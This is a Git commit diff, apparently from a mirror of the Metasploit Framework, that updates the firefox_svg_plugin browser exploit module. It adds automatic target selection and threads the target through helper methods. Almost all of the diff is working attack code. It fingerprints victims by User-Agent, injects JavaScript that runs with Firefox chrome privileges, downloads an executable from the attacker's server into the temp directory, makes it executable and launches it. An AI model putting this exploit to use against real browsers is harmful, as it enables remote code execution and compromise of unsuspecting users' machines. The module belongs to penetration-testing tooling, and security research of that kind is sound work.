infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix target selection probs, and swf path

unstable
sinn3r 2013-05-22 14:34:00 -05:00
parent aae4768563
commit 0e6576747a
1 changed files with 52 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
modules/exploits/multi/browser/firefox_svg_plugin.rb
View File

@ -33,8 +33,12 @@ class Metasploit3 < Msf::Exploit::Remote
with script access should be able to trigger it. with script access should be able to trigger it.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Targets' => [ 'Platform' => 'win',
[ 'Windows x86 (Native Payload)', 'Targets' =>
[
[ 'Automatic', {} ],
[
'Windows x86 (Native Payload)',
{ {
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86 'Arch' => ARCH_X86
@ -78,12 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
if target != get_target(request.headers['User-Agent']) my_target = get_target(request.headers['User-Agent'])
print_status("User agent does not match an available payload type, bailing.") if my_target.nil?
print_error("User agent does not match an available payload type, bailing.")
send_not_found(cli) send_not_found(cli)
return return
end end
target = my_target
print_status(target.name)
if request.uri =~ /\.swf$/ if request.uri =~ /\.swf$/
# send Flash .swf for navigating the frame to chrome:// # send Flash .swf for navigating the frame to chrome://
print_status("Sending .swf trigger.") print_status("Sending .swf trigger.")
@ -94,33 +102,38 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' }) send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
else else
# send initial HTML page # send initial HTML page
print_status("Target selected: #{target.name}")
print_status("Sending #{self.name}") print_status("Sending #{self.name}")
send_response_html(cli, generate_html) send_response_html(cli, generate_html(target))
end end
handler(cli) handler(cli)
end end
# @return [String] the encoded executable for dropping onto the client's machine # @return [String] the encoded executable for dropping onto the client's machine
def dropped_file_contents(cli) def dropped_file_contents(cli)
regenerate_payload(cli).encoded_exe() return if ((p=regenerate_payload(cli)) == nil)
generate_payload_exe( {:code=>p.encoded} )
end end
# @return [Msf::Module::Target] that matches the client's user-agent header # @return [Msf::Module::Target] that matches the client's user-agent header
def get_target(agent) def get_target(agent)
# browser detection # Not firefox, bail
if agent !~ /firefox/i if agent !~ /firefox/i
return nil return nil
end end
# User wants to manually specify a target, respect that
if target != targets[0]
return target
end
# os detection # os detection
if agent =~ /windows/i if agent =~ /windows/i
print_status 'Windows detected.'
targets[0]
elsif agent =~ /linux/i
print_status 'Linux detected.'
targets[1] targets[1]
elsif agent =~ /macintosh/i and agent =~ /intel/i elsif agent =~ /linux/i
print_status 'OSX detected.'
targets[2] targets[2]
elsif agent =~ /macintosh/i and agent =~ /intel/i
targets[3]
else else
nil nil
end end
@ -133,8 +146,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# @return [String] the filename that will be used when the payload is dropped # @return [String] the filename that will be used when the payload is dropped
def payload_filename def payload_filename(target)
if target.name == 'Windows x86 (Native Payload)' if target.name =~ /Windows x86/i
"#{Rex::Text.rand_text_alphanumeric(8)}.exe" "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
else else
"#{Rex::Text.rand_text_alphanumeric(8)}.bin" "#{Rex::Text.rand_text_alphanumeric(8)}.bin"
@ -142,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# @return [String] containing javascript code to execute with chrome privileges # @return [String] containing javascript code to execute with chrome privileges
def js_payload def js_payload(target)
%Q| %Q|
#{js_debug("Injection successful. JS executing with chrome privileges.")} #{js_debug("Injection successful. JS executing with chrome privileges.")}
var x = new XMLHttpRequest; var x = new XMLHttpRequest;
@ -153,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
var file = Components.classes["@mozilla.org/file/directory_service;1"] var file = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties) .getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile); .get("TmpD", Components.interfaces.nsIFile);
file.append('#{payload_filename}'); file.append('#{payload_filename(target)}');
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"] var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
.createInstance(Components.interfaces.nsIFileOutputStream); .createInstance(Components.interfaces.nsIFileOutputStream);
stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0); stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
@ -163,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
} else { } else {
stream.close(); stream.close();
} }
#{chmod_code} #{chmod_code(target)}
#{js_debug("'Downloaded to: '+file.path", "")} #{js_debug("'Downloaded to: '+file.path", "")}
var process = Components.classes["@mozilla.org/process/util;1"] var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess); .createInstance(Components.interfaces.nsIProcess);
@ -179,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# @return [String] containing javascript that will chmod the dropped executable # @return [String] containing javascript that will chmod the dropped executable
def chmod_code def chmod_code(target)
return '' if target.name == 'Windows x86 (Native Payload)' return '' if target.name == 'Windows x86 (Native Payload)'
%Q| %Q|
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
@ -194,15 +207,15 @@ class Metasploit3 < Msf::Exploit::Remote
def base_url def base_url
proto = (datastore["SSL"] ? "https" : "http") proto = (datastore["SSL"] ? "https" : "http")
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}" "#{proto}://#{myhost}:#{datastore['SRVPORT']}#{get_resource}"
end end
# @return [String] HTML that is sent in the first response to the client # @return [String] HTML that is sent in the first response to the client
def generate_html def generate_html(target)
vars = { vars = {
:symbol_id => 'a', :symbol_id => 'a',
:random_domain => 'safe', :random_domain => 'safe',
:payload => js_payload, :payload => js_payload(target),
:payload_var => 'c', :payload_var => 'c',
:payload_key => 'k', :payload_key => 'k',
:payload_obj_var => 'payload_obj', :payload_obj_var => 'payload_obj',